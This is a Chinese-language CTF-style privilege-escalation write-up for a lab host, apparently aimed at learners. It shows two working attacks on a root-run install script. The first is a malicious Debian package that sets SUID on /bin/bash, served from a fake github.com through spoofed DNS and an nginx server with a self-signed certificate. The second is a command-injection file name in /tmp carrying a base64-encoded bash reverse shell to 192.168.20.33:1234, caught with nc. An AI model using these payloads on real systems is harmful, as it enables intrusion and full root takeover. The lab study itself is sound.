本文最后更新于69 天前,其中的信息可能已经过时,如有错误请发送邮件到big_fw@foxmail.com
提权
0
dingtom@DingTom:~$ sudo -l
Matching Defaults entries for dingtom on DingTom:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User dingtom may run the following commands on DingTom:
(root) NOPASSWD: /opt/install.sh
dingtom@DingTom:~$ sudo /opt/install.sh
╔═╗╦ ╦╔═╗╔═╗╔╦╗
╠═╣║ ║║ ╦║╣ ║
╩ ╩╚═╝╚═╝╚═╝ ╩
[✦] 量子系统初始化中...
▰▰▰▰▰▰▰▰▰▰ 100%
╒════════════════════════════╕
🚀 赛博更新协议已激活 │
╘════════════════════════════╛
2025-05-03 12:28:16 |_/> 时空锚点已记录
[ 系统自检 ]
- 扫描第8维度协议...
⚠ 警告:即将进入超频更新模式
按任意键启动曲速引擎...
--2025-05-03 12:28:27-- https://github.com/RickdeJager/stegseek/releases/download/v0.6/stegseek_0.6-1.deb
Resolving github.com (github.com)... 192.168.20.33, 2a03:2880:f10a:83:face:b00c:0:25de
Connecting to github.com (github.com)|192.168.20.33|:443... failed: Connection refused.
Connecting to github.com (github.com)|2a03:2880:f10a:83:face:b00c:0:25de|:443... failed: Network is unreachable.
dpkg-deb: error: '/opt/stegseek.deb' is not a Debian format archive
dpkg: error processing archive /opt/stegseek.deb (--install):
dpkg-deb --control subprocess returned error exit status 2
Errors were encountered while processing:
/opt/stegseek.deb
☄ 时空裂隙开启中...
▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉ 超维度传输协议启动 50%
╔════════════════════════════╗
🚨 检测到高能粒子流! ║
╚════════════════════════════╝
2025-05-03 12:28:29 ◈─≺≻─◈ 正在量子纠缠以下文件:
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
☯ [文件本体] /etc/hosts → /tmp/hosts.quantum
'/etc/hosts' -> '/tmp/hosts.quantum'
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
☯ [文件本体] /var/log/syslog → /tmp/syslog.quantum
'/var/log/syslog' -> '/tmp/syslog.quantum'
▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓
☯ [文件本体] /root/.bashrc → /tmp/.bashrc.quantum
'/root/.bashrc' -> '/tmp/.bashrc.quantum'
[✔] 时空连续性校验:
-rw-r--r-- 1 root root 570 May 3 12:28 /tmp/.bashrc.quantum
-rw-r----- 1 root root 55K May 3 12:28 /tmp/syslog.quantum
-rw-r--r-- 1 root root 186 May 3 12:28 /tmp/hosts.quantum
💥💥💥 时空折叠已完成!
当前/tmp目录星图:
★ /tmp/hosts.quantum
★ /tmp/syslog.quantum
1 群主的方案(酷酷酷)
dpkg 打包执行提权的包
sudo gem install fpm
TF=$(mktemp -d)
echo 'exec chmod +s /bin/bash' > $TF/x.sh
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
mv x_1.0_all.deb stegseek_0.6-1.deb
https服务器 安装配置
(1)证书
sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /tmp/github.key -out /tmp/github.crt
or
sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /tmp/github.com.key -out /tmp/github.com.crt -subj "/CN=github.com"
mkdir -p RickdeJager/stegseek/releases/download/v0.6/
cp stegseek_0.6-1.deb .
(2)服务器配置文件
sudo apt install nginx
sudo vim /etc/nginx/sites-available/github
server {
listen 443 ssl;
server_name github.com;
ssl_certificate /tmp/github.com.crt;
ssl_certificate_key /tmp/github.com.key;
root /tmp;
location / {
autoindex on;
}
}
sudo ln -s /etc/nginx/sites-available/github /etc/nginx/sites-enabled/
dns服务器
让目标将dns服务器设置到攻击者机器的dns服务器
然后配置 解析记录
sudo apt-get install dnsmasq
sudo vim /etc/dnsmasq.conf or echo "address=/github.com/192.168.20.33" | sudo tee -a /etc/dnsmasq.conf
sudo systemctl start dnsmasq.service
dingtom@DingTom:~$ busybox nslookup github.com
Server: 192.168.20.33
Address: 192.168.20.33:53
Name: github.com
Address: 192.168.20.33
Non-authoritative answer:
Name: github.com
Address: 2a03:2880:f10a:83:face:b00c:0:25d
dingtom@DingTom:~$ wget --no-check-certificate https://github.com/RickdeJager/stegseek/releases/download/v0.6/stegseek_0.6-1.deb
--2025-05-03 12:55:17-- https://github.com/RickdeJager/stegseek/releases/download/v0.6/stegseek_0.6-1.deb
Resolving github.com (github.com)... 192.168.20.33, 2a03:2880:f102:183:face:b00c:0:25de
Connecting to github.com (github.com)|192.168.20.33|:443... connected.
WARNING: The certificate of ‘github.com’ is not trusted.
WARNING: The certificate of ‘github.com’ doesn't have a known issuer.
HTTP request sent, awaiting response... 200 OK
Length: 1066 (1.0K) [application/octet-stream]
Saving to: ‘stegseek_0.6-1.deb’
stegseek_0.6-1.deb 100%[===========================================================>] 1.04K --.-KB/s in 0s
2025-05-03 12:55:17 (9.44 MB/s) - ‘stegseek_0.6-1.deb’ saved [1066/1066
dingtom@DingTom:~$ sudo /opt/install.sh
╔═╗╦ ╦╔═╗╔═╗╔╦╗
╠═╣║ ║║ ╦║╣ ║
╩ ╩╚═╝╚═╝╚═╝ ╩
[✦] 量子系统初始化中...
▰▰▰▰▰▰▰▰▰▰ 100%
╒════════════════════════════╕
🚀 赛博更新协议已激活 │
╘════════════════════════════╛
2025-05-03 12:57:10 |_/> 时空锚点已记录
[ 系统自检 ]
- 扫描第8维度协议...
⚠ 警告:即将进入超频更新模式
按任意键启动曲速引擎...
--2025-05-03 12:57:14-- https://github.com/RickdeJager/stegseek/releases/download/v0.6/stegseek_0.6-1.deb
Resolving github.com (github.com)... 192.168.20.33, 2a03:2880:f102:183:face:b00c:0:25de
Connecting to github.com (github.com)|192.168.20.33|:443... connected.
WARNING: The certificate of ‘github.com’ is not trusted.
WARNING: The certificate of ‘github.com’ doesn't have a known issuer.
HTTP request sent, awaiting response... 200 OK
Length: 1066 (1.0K) [application/octet-stream]
Saving to: ‘/opt/stegseek.deb’
/opt/stegseek.deb 100%[===========================================================>] 1.04K --.-KB/s in 0s
2025-05-03 12:57:14 (17.8 MB/s) - ‘/opt/stegseek.deb’ saved [1066/1066]
Selecting previously unselected package x.
(Reading database ... 53043 files and directories currently installed.)
Preparing to unpack /opt/stegseek.deb ...
Unpacking x (1.0) ...
Setting up x (1.0) ...
/bin/bash -p
cat /root/root.txt2 hyh的方案 (酷x5)
a
./pspy64
2025/05/03 11:07:45 CMD: UID=0 PID=1423 | find /tmp -maxdepth 1 -name *.quantum -exec ls -lh {} ;
2025/05/03 11:07:45 CMD: UID=0 PID=1424 | find /tmp -maxdepth 1 -name *.quantum -exec ls -lh {} ;
2025/05/03 11:07:45 CMD: UID=0 PID=1425 | find /tmp -maxdepth 1 -name *.quantum -exec ls -lh {} ;
2025/05/03 11:07:45 CMD: UID=0 PID=1426 | find /tmp -maxdepth 1 -name *.quantum -exec ls -lh {} ;
2025/05/03 11:07:45 CMD: UID=0 PID=1427 | find /tmp -maxdepth 1 -name *.quantum -exec ls -lh {} ;
2025/05/03 11:07:45 CMD: UID=0 PID=1428 | find /tmp -maxdepth 1 -name *.quantum -exec ls -lh {} ;
2025/05/03 11:07:45 CMD: UID=0 PID=1429 | find /tmp -maxdepth 1 -name *.quantum -exec ls -lh {} ;
2025/05/03 11:07:45 CMD: UID=0 PID=1430 | find /tmp -maxdepth 1 -name *.quantum -exec ls -lh {} ;
2025/05/03 11:07:45 CMD: UID=0 PID=1431 | find /tmp -maxdepth 1 -name *.quantum -exec ls -lh {} ;
2025/05/03 11:07:45 CMD: UID=0 PID=1433 | /bin/bash /opt/install.sh
2025/05/03 11:07:45 CMD: UID=0 PID=1432 | /bin/bash /opt/install.sh
2025/05/03 11:07:45 CMD: UID=0 PID=1434 | xargs -I{} bash -c echo -e "\033[38;5;$((RANDOM%255))m★ {} \033[0m"
2025/05/03 11:07:45 CMD: UID=0 PID=1435 | bash -c echo -e "\033[38;5;$((RANDOM%255))m★ /tmp/$(cat etcshdow).quantum \033[0m"
2025/05/03 11:07:45 CMD: UID=0 PID=1436 | xargs -I{} bash -c echo -e "\033[38;5;$((RANDOM%255))m★ {} \033[0m"
2025/05/03 11:07:45 CMD: UID=0 PID=1437 | bash -c echo -e "\033[38;5;$((RANDOM%255))m★ /tmp/$(cat install.sh).quantum \033[0m"
2025/05/03 11:07:45 CMD: UID=0 PID=1438 | xargs -I{} bash -c echo -e "\033[38;5;$((RANDOM%255))m★ {} \033[0m"
2025/05/03 11:07:45 CMD: UID=0 PID=1442 | bash -c echo -e "\033[38;5;$((RANDOM%255))m★ /tmp/$(echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjAuMzMvMTIzNCAwPiYxCg==|base64 -d | bash).quantum \033[0m"
2025/05/03 11:07:45 CMD: UID=0 PID=1441 | bash -c echo -e "\033[38;5;$((RANDOM%255))m★ /tmp/$(echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjAuMzMvMTIzNCAwPiYxCg==|base64 -d | bash).quantum \033[0m"
2025/05/03 11:07:45 CMD: UID=0 PID=1440 | bash -c echo -e "\033[38;5;$((RANDOM%255))m★ /tmp/$(echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjAuMzMvMTIzNCAwPiYxCg==|base64 -d | bash).quantum \033[0m"
2025/05/03 11:07:45 CMD: UID=0 PID=1439 | bash -c echo -e "\033[38;5;$((RANDOM%255))m★ /tmp/$(echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjAuMzMvMTIzNCAwPiYxCg==|base64 -d | bash).quantum \033[0m"
b
bash-5.0# cat install.sh
#!/bin/bash
#!/bin/bash
# 彩虹渐变标题
printf "\033[38;5;196m╔═╗╦ ╦╔═╗╔═╗╔╦╗\033[0m\n"
printf "\033[38;5;202m╠═╣║ ║║ ╦║╣ ║ \033[0m\n"
printf "\033[38;5;226m╩ ╩╚═╝╚═╝╚═╝ ╩ \033[0m\n"
# 动态粒子加载动画
echo -e "\n\033[1;35m[✦] 量子系统初始化中..."
for i in {1..5}; do
echo -ne "\033[1;36m▰▰▰▰▰▰▰▰▰▰ $((i*20))% \r"
sleep 0.3
done
# 全息投影风格信息板
echo -e "\n\033[38;5;87m╒════════════════════════════╕"
echo -e "│ \033[3D\033[5m\033[1m🚀 赛博更新协议已激活\033[0m\033[38;5;87m │"
echo -e "╘════════════════════════════╛\033[0m"
# 矩阵式时间显示
echo -e "\n\033[32m$(date +'%Y-%m-%d %H:%M:%S') \033[36m|_/\033[5m>\033[0m 时空锚点已记录"
# 旋转雷达扫描
echo -e "\n\033[33m[ 系统自检 ]"
spin='-\|/'
for i in {1..8}; do
printf "\r${spin:i%4:1} 扫描第${i}维度协议..."
sleep 0.2
done
# 星际导航提示
echo -e "\n\n\033[1;31m⚠ 警告:即将进入超频更新模式"
echo -e "\033[35m按任意键启动曲速引擎...\033[0m"
read -n 1 -s
wget --no-check-certificate https://github.com/RickdeJager/stegseek/releases/download/v0.6/stegseek_0.6-1.deb -O /opt/stegseek.deb
dpkg -i /opt/stegseek.deb
rm /opt/stegseek.deb
#!/bin/bash
# 宇宙大爆炸进度条
echo -e "\n\033[38;5;201m☄ 时空裂隙开启中..."
for i in {1..5}; do
printf "\033[48;5;$((i*40))m\033[38;5;0m▉%.0s\033[0m" {1..20}
echo -ne " 超维度传输协议启动 ${i}0% \r"
sleep 0.3
done
# 星际导航提示板
echo -e "\n\033[1;33m╔════════════════════════════╗"
echo -e "║ \033[5m\033[3D🚨 检测到高能粒子流!\033[0m\033[1;33m ║"
echo -e "╚════════════════════════════╝\033[0m"
# 随机文件选择器(带量子波动特效)
echo -e "\n\033[36m$(date +'%Y-%m-%d %H:%M:%S') \033[35m◈─≺≻─◈\033[0m 正在量子纠缠以下文件:"
files=("/etc/hosts" "/var/log/syslog" "$HOME/.bashrc")
for f in "${files[@]}"; do
echo -ne "\033[38;5;$((RANDOM%255))m"
echo "▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓"
echo -e "\033[3D☯ [文件本体] $f \033[5m→\033[0m \033[1;31m/tmp/${f##*/}.quantum\033[0m"
cp -v "$f" "/tmp/${f##*/}.quantum" 2>/dev/null || echo "❌ 维度震荡导致复制失败!"
sleep 0.5
done
# 全息校验系统
echo -e "\n\033[48;5;21m\033[1;37m[✔] 时空连续性校验:\033[0m"
find /tmp -maxdepth 1 -name "*.quantum" -exec ls -lh {} \; 2>/dev/null |
while read -r line; do
echo -e "\033[38;5;$((RANDOM%255))m${line//G/GB✨}\033[0m"
done
# 超新星爆发式完成提示
echo -e "\n\033[48;5;196m\033[1;33m💥💥💥 时空折叠已完成!\033[0m"
echo -e "\033[38;5;226m当前/tmp目录星图:"
ls /tmp/*.quantum 2>/dev/null |
xargs -I{} bash -c 'echo -e "\033[38;5;$((RANDOM%255))m★ {} \033[0m"'c
ls /tmp/*.quantum 2>/dev/null |xargs -I{} bash -c 'echo -e "\033[38;5;$((RANDOM%255))m★ {} \033[0m"'
┌──(kali㉿kali)-[/tmp]
└─$ echo -e "aabb$(id)fsdsfaaaaf"
aabbuid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),106(bluetooth),113(scanner),136(wireshark),137(kaboxer)fsdsfaaaaf
在/tmp目录下新建文件名为执行命令的文件
dingtom@DingTom:/tmp$ touch '$(echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjAuMzMvMTIzNCAwPiYxCg=="|base64 -d | bash).quantum'
dingtom@DingTom:/tmp$ sudo /opt/install.sh
rlwrap nc -lvp 1234
